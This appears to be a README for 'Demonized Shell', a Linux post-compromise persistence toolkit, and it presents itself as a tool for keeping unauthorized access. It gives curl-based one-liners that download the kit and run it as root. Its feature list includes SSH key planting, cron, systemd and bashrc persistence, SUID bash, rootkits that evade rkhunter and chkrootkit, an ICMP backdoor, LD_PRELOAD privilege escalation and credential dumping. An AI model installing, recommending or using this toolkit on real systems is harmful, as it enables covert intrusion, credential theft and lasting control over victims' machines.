Demonized Shell is an Advanced Tool for persistence in linux.
Demonized Shell is a sophisticated tool designed for achieving persistence in Linux systems. Its advanced features allow for maintaining unauthorized access over extended periods, making it a potent tool for malicious actors seeking to maintain control over compromised systems.
Install
git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh
One-Liner Install
Download D3m0n1z3dShell with all files:
curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh
Load D3m0n1z3dShell statically (without the static-binaries directory):
sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh
Demonized Features
- Auto Generate SSH keypair for all users
- APT Persistence
- Crontab Persistence
- Systemd User level
- Systemd Root Level
- Bashrc Persistence
- Privileged user & SUID bash
- LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
- LKM Rootkit With file encoder. persistent icmp backdoor and others features.
- ICMP Backdoor
- LD_PRELOAD Setup PrivEsc
- Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling and Others Binaries.
Pending Features
- LD_PRELOAD Rootkit
- Process Injection
- install for example: curl github.com/test/test/demonized.sh | bash
- Static D3m0n1z3dShell
- Intercept Syscall Write from a file
- ELF/Rootkit Anti-Reversing Technique
- PAM Backdoor
- rc.local Persistence
- init.d Persistence
- motd Persistence
- Persistence via php webshell.
- ACL Persistence.
And other types of features that will come in the future.